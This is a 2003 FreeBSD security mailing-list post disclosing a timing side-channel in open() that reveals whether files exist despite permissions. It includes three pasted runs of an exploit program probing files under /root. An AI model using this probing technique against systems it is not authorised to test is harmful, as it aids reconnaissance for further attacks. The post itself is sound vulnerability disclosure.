From: "Nathan J. Yoder"
To: freebsd-security@freebsd.org
Date: Mon, 7 Apr 2003 15:02:42 -0400
Message-ID: <11345416793.20030407150242@gummibears.nu>
Subject: timing related vulnerability that reveals whether files exist without regard to permissions

There was a recent post to BugTraq (April 2nd) detailing a multi-platform vulnerability. An archived copy of this posting can be found at http://www.securityfocus.com/archive/1/317425. This vulnerability is a timing based attack on system calls that can be used to reveal whether or not a file exists without regard to permissions.
The attack works based off the fact that using the open() system call to test whether a file exists will return significantly faster if the file doesn't exist (about 4 times faster in my testing). This vulnerability in itself does not present a serious security risk; however, as outlined by the BugTraq post, it can be used in conjunction with another attack. Even worse, the idea that such a timing related vulnerability exists and that it wasn't accounted for at all suggests that many other system calls and aspects of various OSes (not just FreeBSD) may be vulnerable to more serious timing related vulnerabilities.

Call me paranoid, but in lieu of this, the ssl timing attack (ability to derive the private key), the recent qpopper one (ability to test to see if users exist), my daemon-sense is tingling, telling me that there is going to be a huge flood of timing attacks over the next few years. One of the problems is that compensating for this is not easy because there is no generic solution short of adding intentional delays (like with Matt Blaze's? quantization library), which gives you a fixed performance penalty.

TESTING DETAILS

I ran the following commands on a FreeBSD 4.7-RELEASE computer using the exploit provided in the BugTraq posting. Provided below are 3 trial runs of the program. Note the time discrepancy between trying to open an existing and non-existent file.

NOTE: I needed to remove the O_SYNC flag from the "int flags" line (it doesn't seem to exist on 4.7-R) and I needed to include the header file in the exploit to make it work.
[njyoder@topcat ~/temp]$ uname -a
FreeBSD topcat.mine.nu 4.7-RELEASE-p6 FreeBSD 4.7-RELEASE-p6 #21: Sat Mar 1 06:07:58 EST 2003 njyoder@topcat.mine.nu:/usr/obj/usr/src/sys/TOPCAT i386

[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d--------- 2 njyoder users 512 Apr 5 17:29 unreachable/
[+] Timing open() on unreachable/iexist
[+] Successful: 83 usecs, got m
[+] Timing open() on unreachable/non-existant
[+] Failure: 22 usecs, got m
[+] Using 35 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
[+] /root/.bashrc doesn't exist (29 usecs), got m
[+] /root/non-existant doesn't exist (21 usecs), got m
[+] cleaning up

[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/
[+] Timing open() on unreachable/iexist
[+] Successful: 86 usecs, got m
[+] Timing open() on unreachable/non-existant
[+] Failure: 23 usecs, got m
[+] Using 36 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
[+] /root/.bashrc doesn't exist (28 usecs), got m
[+] /root/non-existant doesn't exist (22 usecs), got m
[+] cleaning up

[njyoder@topcat ~/temp]$ ./evil
[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/
[+] Timing open() on unreachable/iexist
[+] Successful: 84 usecs, got m
[+] Timing open() on unreachable/non-existant
[+] Failure: 22 usecs, got m
[+] Using 35 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
[+] /root/.bashrc doesn't exist (27 usecs), got m
[+] /root/non-existant doesn't exist (20 usecs), got m
[+] cleaning up

------------------------------------------------
Nathan J. Yoder
http://www.gummibears.nu/
http://www.gummibears.nu/files/njyoder_pgp.key
------------------------------------------------